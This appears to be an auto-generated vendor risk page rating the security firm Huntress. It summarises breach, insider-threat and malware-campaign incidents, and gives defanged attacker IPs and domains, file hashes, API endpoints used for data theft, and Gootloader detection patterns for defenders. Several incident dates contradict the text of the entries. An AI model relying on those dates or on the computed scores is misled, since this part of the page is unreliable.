Rankiteo Logo
Rankiteo
Leader in Cyber Underwriting
Loading...
NEWRankiteo Cyber Underwriting Desktop - Score, price, and bind from your desktop
WindowsmacOSLinux
Download
Huntress

Huntress Vendor Cyber Rating & Cyber Score

huntress.com

Protect Your Endpoints, Identities, Logs, and Employees. The fully managed security platform that combines endpoint detection and response, Microsoft 365 identity protection, a predictably affordable SIEM and science-based security awareness training. Powered by custom-built enterprise technology for mid-market enterprises, small businesses, and the MSPs that support them and delivered by unrivaled industry analysts in our 24/7 Security Operations Center. By delivering a suite of purpose-built solutions that meet budget, security, and peace-of-mind requirements, Huntress is how the globe’s most underresourced businesses defend against today’s cyberthreats. As long as hackers keep hacking, we keep hunting.


Huntress A.I CyberSecurity Scoring

Huntress
Company Information
Website:https://www.huntress.com/demo?utm_source=linkedin&utm_medium=social&utm_campaign=cy25-10-camp-brand-global-broad-all-organic_social_bio
Employees number:847
Number of followers:120,630
NAICS:541514
Industry Type:Computer and Network Security
Homepage:huntress.com
Huntress Risk Score (AI oriented)
Between 0 and 549
logo
HuntressComputer and Network Security
Updated:
30/06/2026
475/1000
Critical
C
AaaAaABaaBaBCaaCaC
Powered by our proprietary A.I cyber incident model
Insurance prefers TPRM score to calculate premium
Huntress Global Score (TPRM)
xxxx
logo
HuntressComputer and Network Security
•••
Score locked
Instant access to detailed risk factors
Vulnerabilities
Benchmark vs. industry & size peers
Findings

Huntress
HuntressCritical
Current Score
475C (CRITICAL)
01000
7 incidents
-49.17 avg impact
Incident timeline with MITRE ATT&CK tactics, techniques, and mitigations.
JULY 2026
476Before Incident
JUNE 2026
537Before Incident
Breach
25 Jun 2026Huntress
Klue: Klue Hit by Double Extortion as Second Hacker Group Emerges

Klue Faces Unprecedented Dual Extortion Attack After Data Breach

474After Incident
CRITICAL-63
KLU1782428022
Klue Faces Unprecedented Dual Extortion Attack After Data Breach Vancouver-based market intelligence platform Klue has disclosed a rare and escalating cybersecurity crisis, involving two criminal groups with conflicting extortion demands following a data breach. The incident, first reported by TechCrunch, marks an unusual case of competing threats targeting the same victim highlighting evolving tactics in cyber extortion. The breach initially involved a hacking group that stole sensitive customer data, including proprietary market research, competitive analysis, and strategic planning materials used by enterprise clients to track rivals. In a surprising turn, the original attackers later claimed they were deleting the stolen files, though Klue’s customers were warned not to assume the threat had passed. Before any relief could set in, a second criminal group emerged, demanding ransom for the same compromised data. The situation leaves Klue’s enterprise clients including sales and marketing teams at major corporations in limbo, uncertain whether their highly sensitive business intelligence has been destroyed, leaked, or is now in the hands of multiple threat actors. The competitive intelligence sector handles particularly valuable data, such as go-to-market strategies and product roadmaps, which could cause significant damage if exposed. Security researchers note that while secondary markets for stolen data are not new, the simultaneous, opposing claims from two criminal groups are highly unusual. The first group’s alleged data deletion could be a face-saving exit or genuine reversal, while the second group’s demands suggest they either independently accessed Klue’s systems or acquired the data from the original attackers. Klue has not disclosed technical details of the breach, the scope of compromised data, or the number of affected customers. The incident underscores the cascading risks of B2B SaaS breaches, where third-party vendors handling critical business intelligence become high-value targets. It also arrives amid growing enterprise concerns over vendor security postures, following high-profile breaches at platforms like Okta and LastPass.
INCIDENT DETAILS -
TYPE
data_breachransomwaredual_extortion
MOTIVATION
financial gaindata extortion
IMPACT
Data Compromised: proprietary market research, competitive analysis, strategic planning materials, go-to-market strategies, product roadmapsBrand Reputation Impact: high
DATA BREACH
proprietary market researchcompetitive analysisstrategic planning materialsgo-to-market strategiesproduct roadmapsSensitivity Of Data: high
JUNE 2026
556Before Incident
Cyber Attack
17 Jun 2026Huntress
Huntress, Salesforce and Klue: Klue OAuth breach linked to 'Icarus' Salesforce data theft attacks

Klue OAuth Breach Exposes Salesforce Data in Icarus Extortion Campaign

536After Incident
CRITICAL-20
HUNSALKLU1781793603
Klue OAuth Breach Exposes Salesforce Data in Icarus Extortion Campaign A recent OAuth breach at market intelligence platform Klue has enabled the Icarus threat group to steal Salesforce CRM data from multiple organizations as part of an ongoing extortion campaign. The attack, first reported by BleepingComputer and confirmed by cybersecurity firms ReliaQuest and Huntress, has prompted Salesforce to disable the Klue Battlecards integration while investigations continue. ### How the Attack Unfolded Attackers compromised Klue’s backend systems, leveraging a dormant but active credential from a prototype integration. Once inside, they deployed a malicious code update to harvest OAuth tokens used by customers to connect Klue Battlecards with third-party platforms, including Salesforce. Using these stolen tokens, the threat actors executed automated Python scripts to query Salesforce’s REST API for nearly 24 hours. Initial reconnaissance targeted the `/services/data/v59.0/sobjects` endpoint, followed by rapid data exfiltration via `/services/data/v59.0/query`. In one case, attackers sent nearly 1,000 queries in 15 minutes, shifting from stealthy reconnaissance to high-speed theft. ### Extortion Demands & Icarus Involvement While initial activity resembled past attacks by ShinyHunters, BleepingComputer confirmed that the Icarus group active since April 2026 is behind the campaign. Victims received extortion emails from an alias "mr bean" with a Session Messenger ID for contact. Icarus’s data leak site also teased the campaign with a post titled "Get Ready," warning of upcoming corporate listings. Huntress, one of the affected organizations, confirmed receiving a similar extortion email, with the provided Session ID matching Icarus’s dark web leak site. The stolen data includes business contacts, sales communications, price quotes, competitive intelligence reports, and account details, though no evidence suggests compromise of passwords, payment data, or engineering systems. ### Response & Mitigation Klue has disabled integrations with Salesforce, HubSpot, SharePoint, Zoom, Gong, Chorus, Clari, Google Drive, and Slack while addressing the breach. Salesforce has also suspended the Klue Battlecards app, preventing new connections until further notice. Security firms have shared IP addresses linked to the attacks: - 138.226.246.94 - 212.86.125.24 - 213.111.148.90 - 94.154.32.160 Organizations using Klue integrations are urged to review logs, revoke OAuth tokens, terminate active sessions, and monitor for unusual API activity.
INCIDENT DETAILS -
TYPE
Data Breach, Extortion
MOTIVATION
Extortion, Data Theft
IMPACT
Data Compromised: Business contacts, sales communications, price quotes, competitive intelligence reports, account detailsSystems Affected: Salesforce CRM, Klue Battlecards integrationOperational Impact: Klue disabled integrations with Salesforce, HubSpot, SharePoint, Zoom, Gong, Chorus, Clari, Google Drive, and Slack; Salesforce suspended the Klue Battlecards appPayment Information Risk: No evidence of compromise
DATA BREACH
Type Of Data Compromised: Business contacts, sales communications, price quotes, competitive intelligence reports, account detailsSensitivity Of Data: High (competitive intelligence, sales data)Data Exfiltration: Yes, via Salesforce REST API queriesPersonally Identifiable Information: Business contacts (no evidence of PII like passwords or payment data)
JUNE 2026
616Before Incident
Breach
01 Jun 2026Huntress
Huntress and FBI: Huntress CEO says threat hunter used 'poor judgment' in alerting ransomware crim about law enforcement probe

Huntress Investigates Alleged Insider Threat After Employee Shared FBI Intel with Ransomware Operator

554After Incident
CRITICAL-62
FBIHUN1782843828
Huntress Investigates Alleged Insider Threat After Employee Shared FBI Intel with Ransomware Operator Huntress CEO Kyle Hanslovan has acknowledged "questionable" communications between a current threat hunter at the cybersecurity firm and a cybercriminal, describing the exchanges as a lapse in judgment. The incident surfaced after former Huntress analyst Ben Folland accused the employee of acting as an insider threat by allegedly sharing law enforcement details with Devman, a ransomware operator linked to Russia. According to Hanslovan’s blog post, the employee disclosed to Devman that U.S. law enforcement had contacted them about the threat actor. While Hanslovan stated the disclosure was not illegal, he called it "poor judgment" and denied that it constituted insider activity. Huntress has since implemented stricter policies for researcher interactions with threat actors and taken administrative actions, though no evidence of illegal conduct or further disclosures was found. Folland, however, disputes this characterization. In a LinkedIn post, he claimed the employee forwarded FBI communications including agent names to Devman, warning the ransomware operator of an active investigation. He also alleged the employee refused to cooperate with law enforcement, a claim the FBI reportedly confirmed to Folland. Folland argued the actions went beyond poor judgment, equating them to an insider tipping off a criminal under investigation. Devman, known for using modified DragonForce ransomware built on leaked Conti source code, has been publicly targeting Folland and his family. The FBI has not responded to requests for comment, and Huntress has declined further statements. The dispute highlights tensions over ethical boundaries in threat intelligence, with Huntress maintaining the employee’s actions were not malicious, while Folland insists they meet the definition of an insider threat. The investigation remains ongoing.
INCIDENT DETAILS -
TYPE
Insider Threat
MOTIVATION
Tipping off a criminal under investigation
IMPACT
Data Compromised: FBI communications, agent namesOperational Impact: Stricter internal policies implementedBrand Reputation Impact: Potential reputational damage due to insider threat allegations
DATA BREACH
Type Of Data Compromised: Law enforcement communications, agent namesSensitivity Of Data: High (FBI investigation details)Personally Identifiable Information: Agent names
MAY 2026
616Before Incident
APRIL 2026
610Before Incident
MARCH 2026
627Before Incident
Cyber Attack
04 Mar 2026Huntress
Huntress: How a Brute Force Attack Unmasked a Ransomware Infrastructure Network

Huntress Uncovers Ransomware-as-a-Service Ecosystem Behind 'Routine' RDP Brute-Force Attack

607After Incident
LOW-20
HUN1772642134
Huntress Uncovers Ransomware-as-a-Service Ecosystem Behind "Routine" RDP Brute-Force Attack Security researchers at Huntress recently traced a seemingly ordinary Remote Desktop Protocol (RDP) brute-force attack to a sophisticated ransomware-as-a-service (RaaS) operation, exposing a network of initial access brokers and malicious infrastructure. The incident began when Huntress’s SOC detected unusual domain enumeration activity on a network with an exposed RDP server a common but risky configuration. While brute-force attacks are frequent, this case stood out due to atypical behavior: the compromised account was accessed from multiple IP addresses, suggesting a single threat actor leveraging distributed infrastructure. After gaining access, the attacker deviated from standard post-exploitation tactics. Instead of extracting credentials from Windows LSASS or the registry common methods in ransomware attacks they manually searched file shares and text files for passwords, an unusual approach that hinted at a more targeted operation. Further investigation revealed the IP addresses involved were linked to known ransomware groups, including Hive and BlackSuite, as well as a suspicious VPN service (1vpns[.]com) marketed as "no-logs." The infrastructure included a web of geo-distributed servers under the domain specialsseason[.]com, with subdomains tied to multiple countries (e.g., NL-US.specialsseason[.]com, NL-RU.specialsseason[.]com). The naming convention and references to "big game hunting" a term for high-value ransomware targeting strongly indicated ties to RaaS operations. The findings underscore how initial access brokers operate at scale, using legitimate-seeming services to obscure their activities. Huntress’s analysis also highlighted the value of digging beyond routine alerts, as even mundane incidents can reveal broader criminal ecosystems. Key Indicators of Compromise (IOCs): - IPs: 64.190.113[.]159, 147.135.36[.]162 - Domains: specialsseason[.]com, 1vpns[.]com - Certificate Fingerprints (SHA-256): 6bc8b8f260f9f9bfea69863ef8d3c525568676ddadc09c14655191cad1acdb5b, b884cce828f06fb936fd5809d5945d861401c606c4ebe894464c99e6473e9570
INCIDENT DETAILS -
TYPE
Ransomware
MOTIVATION
Financial gain (Ransomware-as-a-Service)
FEBRUARY 2026
624Before Incident
JANUARY 2026
623Before Incident
DECEMBER 2025
728Before Incident
Ransomware
01 Dec 2025Huntress
Huntress: Ex-Huntress analyst claims company insider fed info to a ransomware crim. Social media drama ensues

Huntress Faces Allegations of Insider Threat Linked to Ransomware Group

618After Incident
CRITICAL-110
HUN1782426290
Huntress Faces Allegations of Insider Threat Linked to Ransomware Group Security firm Huntress is embroiled in controversy after a former employee, Ben Folland, accused the company of concealing an insider threat involving a current employee allegedly leaking information to a ransomware operation. Folland, who left Huntress in February, took to LinkedIn to detail his claims, which stem from an incident unrelated to the recent supply-chain attack on Klue a separate breach Huntress disclosed last week. According to Folland, in December 2025, he discovered that a Huntress employee had shared communications from U.S. law enforcement with a cybercriminal known as DevMan, a ransomware operator targeting Folland and his family. DevMan, which emerged in April 2025, is believed to use modified DragonForce ransomware code. Folland alleged the insider was "caught by the FBI" but remains employed at Huntress, raising concerns about ongoing risks to clients and the company’s reputation particularly as Huntress prepares for an IPO. In a resignation letter posted online, Folland stated he left due to "personal reasons and a conflict of interest," later clarifying that Huntress had attempted to "silence" him with legal threats after he raised the issue. He pledged to release evidence over the next two weeks, including FBI communications, internal memos, and recorded conversations between the Huntress employee and DevMan. Huntress CEO Kyle Hanslovan responded through a spokesperson, acknowledging the concerns but framing the incident as a case of "poor judgment" in communications with a cybercriminal. He emphasized that such interactions are sometimes necessary for threat intelligence gathering but assured stakeholders that the company takes the matter seriously. Hanslovan disputed Folland’s characterization of an "insider threat," calling the claims inaccurate and denying that Huntress prioritized its IPO over security. He noted that legal and law enforcement constraints limit public disclosure but hinted at an official statement in the future. The allegations highlight tensions between transparency and operational security in cybersecurity firms, particularly when insider risks intersect with criminal investigations. The outcome may set a precedent for how companies handle similar breaches of trust.
INCIDENT DETAILS -
TYPE
Insider Threat, Ransomware
MOTIVATION
Financial gain, Retaliation
IMPACT
Data Compromised: Law enforcement communications, Internal memos, Recorded conversationsOperational Impact: Reputational damage, Legal threats, Potential client riskBrand Reputation Impact: HighLegal Liabilities: Potential
DATA BREACH
Type Of Data Compromised: Law enforcement communications, Internal memos, Recorded conversationsSensitivity Of Data: High
NOVEMBER 2025
747Before Incident
Cyber Attack
01 Nov 2025Huntress
Huntress, Rhysida and Expel: Gootloader Malware Maintains Low Detection Rate While Bypassing Most Security Tools

Gootloader’s Sophisticated Anti-Detection Tactics Exposed in Latest Campaign

727After Incident
LOW-20
HUNREDEXP1768977371
Gootloader’s Sophisticated Anti-Detection Tactics Exposed in Latest Campaign A recent analysis by Huntress and Expel reveals how the Gootloader malware leverages deliberately malformed ZIP archives to evade security tools while maintaining functionality for targeted victims. The threat actor, known for its role as an initial access broker in ransomware operations, has partnered with Vanilla Tempest, a group deploying Rhysida ransomware, in an ongoing campaign active since November 2025. ### Evasion Through Malformed ZIP Archives Gootloader’s infection chain begins with weaponized ZIP files containing malicious JScript payloads, such as "Indiana_Animal_Protection_Laws_Guide.js." These archives are engineered to bypass analysis tools like 7-Zip and WinRAR while remaining extractable via Windows’ native unarchiving utility. Key evasion techniques include: - Concatenated ZIP structures: Each archive contains 500–1,000 nested ZIP files, with the End of Central Directory (EOCD) record strategically placed to direct extraction to the valid payload. - Truncated EOCD records: Missing critical bytes violate ZIP format standards, causing parsing failures in security tools. - Randomized metadata: Mismatched version numbers, timestamps, CRC32 checksums, and file sizes between local file headers and central directory records further disrupt analysis. - Client-side generation: Victims receive XOR-encoded data blobs decoded by browsers, assembling into identical ZIP structures until reaching 70–80 MB despite the extracted JScript payload being only ~287 KB. ### Execution & Persistence When victims extract and run the JScript file, Windows Script Host (WScript) processes it from `AppData\Local\Temp`, initiating a multi-stage attack: 1. Persistence: Creates LNK shortcuts in the Startup folder, referencing secondary scripts via NTFS short filenames (e.g., `FILENA~1.js`). 2. Obfuscated PowerShell execution: CScript launches the script, which spawns PowerShell processes with heavily obfuscated commands to establish command-and-control (C2) communications. ### Detection & Indicators of Compromise Security teams can identify Gootloader activity by monitoring: - Process patterns: `wscript.exe` executing JScript from temp directories, followed by `cscript.exe` invoking scripts via NTFS shortnames and spawning PowerShell. - File characteristics: ZIP archives with >100 instances of `PK\x03\x04` (local file headers) or `PK\x05\x06` (EOCD records). - Persistence artifacts: LNK files in `\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\`. Known IOCs: - File hash (SHA-256): `b05eb7a367b5b86f8527af7b14e97b311580a8ff73f27eaa1fb793abb902dc6e` - Malicious extensions: `.js`, `.jse` - Execution paths: Temp directories, NTFS shortname scripts Gootloader remains a persistent threat, historically accounting for 11% of malware bypassing enterprise security solutions. Its collaboration with Vanilla Tempest underscores its role in facilitating Rhysida ransomware attacks.
INCIDENT DETAILS -
TYPE
Malware Campaign
MOTIVATION
Initial access for ransomware operations (Rhysida ransomware deployment)
DATA BREACH
.js.jse
OCTOBER 2025
747Before Incident
SEPTEMBER 2025
747Before Incident
AUGUST 2025
746Before Incident
JANUARY 2025
759Before Incident
Cyber Attack
01 Jan 2025Huntress
Huntress: 'CrashFix' Scam Crashes Browsers, Delivers Malware

Sophisticated 'CrashFix' Campaign Targets Corporate Networks with ModeloRAT Malware

742After Incident
LOW-17
HUN1769991856
Sophisticated "CrashFix" Campaign Targets Corporate Networks with ModeloRAT Malware Cybersecurity firm Huntress has uncovered a highly evolved malware campaign attributed to the threat actor KongTuke, which has been active since early 2025. The latest operation, dubbed "CrashFix," demonstrates a marked increase in sophistication, targeting corporate systems with a multi-stage attack chain while deploying a separate, less refined infection method for home users. ### Key Components of the Attack 1. NexShield Malicious Extension – A near-identical replica of the legitimate uBlock Origin Lite ad blocker, distributed via malicious ads. Once installed, the extension remains dormant for an hour before intentionally crashing the browser by flooding the system with connection requests, exhausting memory and CPU resources. 2. CrashFix Social Engineering – After the crash, victims are presented with a fake security warning instructing them to execute a "repair" command via the Windows Run dialog. This command triggers a PowerShell script that establishes contact with the attacker’s command-and-control (C2) server, initiating the infection. 3. ModeloRAT (Python-Based RAT) – Exclusively deployed on domain-joined corporate systems, this previously unseen remote access Trojan (RAT) conducts extensive reconnaissance, collecting data on: - Operating system details - Running processes - Network configurations - User privileges - Installed security tools (e.g., antivirus, virtual machine indicators) ModeloRAT uses RC4 encryption for C2 communications and establishes persistence by modifying Windows Registry keys, often masquerading as legitimate applications like Spotify or Discord to evade detection. ### Targeting & Tactics - Corporate Systems (VIP Treatment) – KongTuke prioritizes enterprise networks, where compromised systems provide access to Active Directory, internal resources, and sensitive data. The malware’s advanced capabilities suggest a focus on high-value targets with greater potential for financial or espionage gains. - Home Users (Test Payloads) – Non-domain systems receive a separate, less polished infection chain. Huntress researchers observed C2 responses labeled "TEST PAYLOAD!!!!", indicating this branch may still be in development or a lower priority. - Anti-Analysis Techniques – The fake "repair" pop-up blocks keyboard shortcuts, disables developer tools, and prevents text selection to hinder investigation. ### Discovery & Indicators of Compromise The campaign was uncovered when a researcher searching for an ad blocker was redirected via a malicious ad to the fraudulent NexShield extension in the Chrome Web Store. Huntress has published indicators of compromise (IoCs), advising organizations to monitor for: - Unusual use of legitimate Windows utilities (e.g., PowerShell) - Suspicious browser extensions with excessive permissions or recent creation dates - Registry Run key entries mimicking legitimate software - Python commands spawning hidden PowerShell processes ### Why This Matters KongTuke’s shift toward enterprise-focused attacks reflects a broader trend of threat actors prioritizing corporate networks for higher returns. The CrashFix technique exploiting user frustration by creating a problem and then offering a "solution" demonstrates a self-sustaining infection loop that increases the likelihood of successful compromise. With ModeloRAT’s advanced reconnaissance and evasion tactics, this campaign poses a significant risk to organizations with domain-joined endpoints.
INCIDENT DETAILS -
TYPE
Malware Campaign
MOTIVATION
Financial GainEspionage
IMPACT
Data Compromised: Operating system details, running processes, network configurations, user privileges, installed security toolsCorporate networksDomain-joined systemsOperational Impact: Potential access to Active Directory, internal resources, and sensitive data
DATA BREACH
Operating system detailsRunning processesNetwork configurationsUser privilegesInstalled security toolsSensitivity Of Data: High (corporate reconnaissance data)Data Encryption: RC4 encryption for C2 communications

Frequently Asked Questions

?
What is the current A.I Rankiteo Cyber Score for Huntress ?
?
What was Huntress's A.I Rankiteo Cyber Score in June 2026 ?
?
What was Huntress's A.I Rankiteo Cyber Score in May 2026 ?
?
What was Huntress's A.I Rankiteo Cyber Score in April 2026 ?
?
What was Huntress's A.I Rankiteo Cyber Score in March 2026 ?
?
What was Huntress's A.I Rankiteo Cyber Score in February 2026 ?
?
What was Huntress's A.I Rankiteo Cyber Score in January 2026 ?
?
What was Huntress's A.I Rankiteo Cyber Score in December 2025 ?
?
What was Huntress's A.I Rankiteo Cyber Score in November 2025 ?
?
What was Huntress's A.I Rankiteo Cyber Score in October 2025 ?
?
What was Huntress's A.I Rankiteo Cyber Score in September 2025 ?
?
What was Huntress's A.I Rankiteo Cyber Score in August 2025 ?
?
What is the average per-incident point impact on Huntress's A.I Rankiteo Cyber Score over the past 12 months ?
?
Where can I access detailed records of all cyber incidents associated with Huntress ?
?
Where can I find a summary of the A.I Rankiteo Risk Scoring methodology ?
?
Where can I view Huntress's profile page on Rankiteo ?
?
How accurate is the A.I Rankiteo Risk Scoring methodology ?